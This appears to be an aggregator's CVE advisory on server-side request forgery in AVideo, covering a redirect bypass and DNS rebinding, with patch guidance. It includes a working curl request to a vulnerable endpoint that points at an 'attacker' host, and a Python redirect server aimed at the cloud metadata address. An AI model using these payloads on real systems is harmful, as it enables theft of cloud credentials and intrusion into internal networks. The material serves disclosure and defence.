Listen to this Post
How the mentioned CVE works (two overlapping vulnerabilities):
<ol>
<li>Redirect Bypass: Vulnerable endpoints. (plugin/AI/receiveAsync.json.php, objects/EpgParser.php) call isSSRFSafeURL() to validate a user-supplied URL. If passing, they fetch it using bare file_get_contents() which, by default, follows HTTP redirects (follow_location=1).</li>
<li> The isSSRFSafeURL() function only checks the initial URL. An attacker supplies a URL to a hostile server that returns a 302 redirect to an internal address (e.g., http://169.254.169.254/latest/meta-data/). Because the redirect target is never re-validated, the internal metadata endpoint is fetched, leaking credentials.</li>
<li>DNS Rebinding TOCTOU: isSSRFSafeURL() has an out-parameter $resolvedIP for DNS pinning (CURLOPT_RESOLVE). Eight out of nine callers discard this parameter. They pass the original hostname to a fetch function (file_get_contents or url_get_contents) which resolves DNS again. An attacker uses a domain with TTL=0 that resolves first to a public IP (passes validation) then to 127.0.0.1 (internal) after validation, causing the server to fetch internal services. Severity: High (CVSS 7.7).</li>
</ol>
DailyCVE form:
Platform: AVideo
Version: Unpatched (all before fix)
Vulnerability: SSRF (redirect+dns rebind)
Severity: High (7.7)
date: 2025-04-15
Prediction: 2025-05-01 (patch within 2 weeks)
What Undercode Say:
Analytics:
- Exploitability: Authenticated attacker, low complexity
- Prevalence: Cloud metadata + internal network scanning
Simulate redirect bypass curl -X POST http://target/plugin/AI/receiveAsync.json.php \ -d "type=image&token=VALID&ai_responses_id=1&response[bash][0][bash]=http://attacker:8888/redir" Attacker-controlled server python3 -c ' from http.server import HTTPServer, BaseHTTPRequestHandler class R(BaseHTTPRequestHandler): def do_GET(self): self.send_response(302) self.send_header("Location", "http://169.254.169.254/latest/meta-data/") self.end_headers() HTTPServer(("0.0.0.0",8888),R).serve_forever() '
Exploit:
- For redirect: Submit a URL that 302s to internal/cloud metadata. The server fetches and stores the response as a video thumbnail.
- For DNS rebinding: Use a domain with TTL=0 and two A records (public IP then 127.0.0.1). Submit to any of the 8 vulnerable endpoints; after validation, the second DNS resolves to internal host, reaching localhost or private IPs.
Protection from this CVE:
- Patch: Replace all file_get_contents() calls with url_get_contents() (which disables redirects and validates each hop).
- For DNS rebinding: Capture $resolvedIP and pass to a fetch function using CURLOPT_RESOLVE to pin the IP. Example:
$ctx = stream_context_create(['http' => ['follow_location' => 0]]); $imageContent = file_get_contents($url, false, $ctx);
Impact:
- Leak cloud IAM credentials, instance metadata
- Access internal databases, admin panels, or monitoring endpoints
- Port-scan internal network via the server as a proxy
- Exfiltrated data stored as thumbnails, retrievable via application UI
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
